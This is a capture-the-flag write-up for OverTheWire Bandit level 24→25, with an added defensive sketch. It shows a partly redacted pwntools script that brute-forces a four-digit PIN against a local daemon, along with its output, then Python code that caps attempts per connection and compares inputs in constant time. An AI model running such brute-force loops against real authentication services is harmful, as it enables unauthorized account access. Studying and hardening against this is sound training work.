November 22, 2018

OverTheWire Bandit write-up (Level 24 → Level 25)

The write-up you are viewing is an ordinary write-up.

To comply with the rules, this write-up covers only some hints related to this challenge. There is no correct answer and no solution here.

For the full write-up PDF, please refer to the Facebook page WARGAMER.

Bandit Level 24 → Level 25

Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

This challenge requires the ability to write a socket program. If you have experience with socket programming, it will be easier.

This is part of the solution process. I was able to find the flag as follows.

bandit24@bandit:~$ nc 127.0.0.1 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ
Fail! You did not supply enough data. Try again.
UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ0001
Fail! You did not supply enough data. Try again.

- Program development. -

bandit24@bandit:/tmp/myCode$ cat ./mycode.py
from pwn import *

HOST='127.0.0.1'
PORT=30002
r = remote(HOST, PORT)
bandit24pw = "UoMYT■■■■■■Xmg6g■■■■■wOmw1■■■Z "

for i in range(0, 10000):

        subStr = ■■■■■■■■■pw + ■■■■■■■■■
        r.sendline(subStr)
        print "[Sended] " + subStr
        rData=■■■■■■■■■■■■
        print '[Received] ' + str(rData)
       
r.close()
bandit24@bandit:/tmp/myCode$
bandit24@bandit:/tmp/myCode$ python ./mycode.py
[+] Opening connection to 127.0.0.1 on port 30002: Done
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ 0000
[Received] I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.

[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ 0001
[Received] Wrong! Please enter the correct pincode. Try again.

[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ 0002
[Received] Wrong! Please enter the correct pincode. Try again.

[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ 0003
[Received] Wrong! Please enter the correct pincode. Try again.

- Omission. -

[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ ■■■■
[Received] Wrong! Please enter the correct pincode. Try again.

[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ ■■■■
[Received] Correct!

[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ ■■■■
[Received] The password of user bandit25 is uN■■■■■■■■E7s■■■■■■■■vZ0r■■■■zG
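
The transcript above shows the daemon answering guess after guess on a single connection, which is what makes going through all 10000 combinations practical. The following is an added example, not part of the original write-up and not the daemon's actual code: a sketch of the same line protocol with a per-connection attempt cap and constant-time comparison. The PinChecker class, the lines_processed helper, the cap of 5, the LOCKED reply, and the sample password and pincode are assumptions constructed for illustration.

```python
import hmac

# Reply strings copied from the transcript above; LOCKED is an assumed addition.
FAIL = "Fail! You did not supply enough data. Try again."
WRONG = "Wrong! Please enter the correct pincode. Try again."
CORRECT = "Correct!"
LOCKED = "Too many attempts. Closing connection."

class PinChecker:
    """Per-connection state for the '<password> <pincode>' line protocol."""
    def __init__(self, password, pin, max_attempts=5):
        self._password = password.encode()
        self._pin = pin.encode()
        self._remaining = max_attempts  # assumed policy: 5 lines per connection
        self.closed = False

    def handle_line(self, line):
        """Return the reply for one input line, or None once closed."""
        if self.closed:
            return None
        self._remaining -= 1  # every line counts, malformed ones included
        parts = line.split()
        if len(parts) == 2:
            # Constant-time, non-short-circuit compares: timing hides which field failed.
            pw_ok = hmac.compare_digest(parts[0].encode(), self._password)
            pin_ok = hmac.compare_digest(parts[1].encode(), self._pin)
            if pw_ok & pin_ok:
                self.closed = True
                return CORRECT
            reply = WRONG
        else:
            reply = FAIL
        if self._remaining <= 0:
            self.closed = True
            return LOCKED
        return reply

def lines_processed(checker, lines):
    """Feed lines until the checker closes; return (count, last_reply)."""
    count, last = 0, None
    for line in lines:
        reply = checker.handle_line(line)
        if reply is None:
            break
        count, last = count + 1, reply
    return count, last

if __name__ == "__main__":
    sweep = ("CONSTRUCTED-PW %04d" % i for i in range(10000))  # constructed input
    print(lines_processed(PinChecker("CONSTRUCTED-PW", "7341"), sweep))
```

A per-connection cap only helps together with a limit that survives reconnects (per source or per account), which this sketch does not implement.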